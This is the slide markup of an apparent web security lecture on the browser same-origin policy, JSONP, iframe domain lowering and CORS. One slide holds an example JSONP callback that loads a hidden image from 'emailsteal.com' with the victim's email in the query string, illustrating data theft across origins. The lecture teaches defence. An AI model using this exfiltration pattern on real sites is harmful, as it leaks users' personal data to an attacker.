                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"jqp@gmail.com"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,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})</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6661924">
            <a:off x="6144228" y="2677946"/>
            <a:ext cx="990600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6661924">
            <a:off x="886429" y="3859045"/>
            <a:ext cx="990600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas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1772859" y="1047128"/>
            <a:ext cx="3200400" cy="1467472"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 78779"/>
              <a:gd name="adj2" fmla="val 109707"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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doUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function runs.  Problems?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3578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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if this is linked from evilsite.com and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doUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can then have access to your personal information?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3276600"/>
            <a:ext cx="8077200" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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nsolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>doUpdate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data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) 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{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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consola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img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>
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= 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document.createElement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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img.src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>
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"http://emailsteal.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>saveEmail.php?addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+ 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escape(data[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'email'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])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img.style.display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>
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"none"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>document.body.appendChild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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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60923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week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Question &amp; answer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47CB-F391-4DAB-9FB4-A73A580B607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69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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problems with JSONP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must trust the site because you’re embedding a script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be exploited on other sites to expose your site’s data.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2812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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to embed one site within another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs isolated from the rest of your page (different origins).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you want www.site1.com to cooperate with my.site1.com across </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, lower the domain: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0" y="4495800"/>
            <a:ext cx="4648200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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nsolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>type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=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"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript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"&gt;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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>document.domain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>
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'site1.com'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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5165823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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to embed one site within another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs isolated from the rest of your page (different origins).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you want www.site1.com to cooperate with my.site1.com across </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, lower the domain: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0" y="4495800"/>
            <a:ext cx="4648200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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nsolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>type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=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"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript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"&gt;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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>document.domain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>
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'site1.com'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;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3581400" y="1600200"/>
            <a:ext cx="4323141" cy="1772272"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36042"/>
              <a:gd name="adj2" fmla="val 115430"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Done on both the parent and child frame, this permits scripts to access data in each other.  Now same origin.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2465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Browser Same Origin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Flash and Silverlight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do people still use these?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key idea:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They check a root file “crossdomain.xml” to know if the domain making the request is authorized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can use wildcards (not recommended)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4888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Browser Same Origin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CORS Cross-origin resource sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to “crossdomain.xml” but done with HTTP headers from the server to control the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can only allow everyone or a single site to request data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending cookies turned off by default, but can be turned on with another header in request/response.  Unsafe.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7977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deadlines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2995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&amp;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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Concerns?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145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Illustrate attacks that are prevented by browser same origin policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the implications of script and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> elements on web application security.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524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Browser Same Origin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Scripts on a page can only access other pages in the browser when all of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The port numbers match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The domains match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocols match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232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Browser Same Origin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Scripts on a page can only access other pages in the browser when all of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The port numbers match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The domains match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocols match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20307670">
            <a:off x="5539137" y="2323955"/>
            <a:ext cx="236571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Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1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1854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Browser Same Origin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Scripts on a page can only access other pages in the browser when all of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The port numbers match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The domains match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocols match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20307670">
            <a:off x="5539137" y="2323955"/>
            <a:ext cx="236571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Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1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733800"/>
            <a:ext cx="1767993" cy="1822862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168833" y="4114800"/>
            <a:ext cx="4267200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74903"/>
              <a:gd name="adj2" fmla="val -28814"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If these all didn’t match, then scripts could read cookies from all open tabs (or open a hidden page and then read cookies).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701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Browser Same Origin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Scripts on a page can only access other pages in the browser when all of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The port numbers match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The domains match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocols match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20307670">
            <a:off x="5539137" y="2323955"/>
            <a:ext cx="236571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Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1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733800"/>
            <a:ext cx="1767993" cy="1822862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168833" y="4114800"/>
            <a:ext cx="4267200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74903"/>
              <a:gd name="adj2" fmla="val -28814"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If these all didn’t match, then scripts could read cookies from all open tabs (or open a hidden page and then read cookies).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1981200" y="990600"/>
            <a:ext cx="3707967" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70918"/>
              <a:gd name="adj2" fmla="val 106601"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So what?  Why is that a problem?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858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Browser Same Origin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Scripts on a page can only access other pages in the browser when all of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The port numbers match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The domains match</a:t>
            </a:r>
          </a:p>
          <a:p>
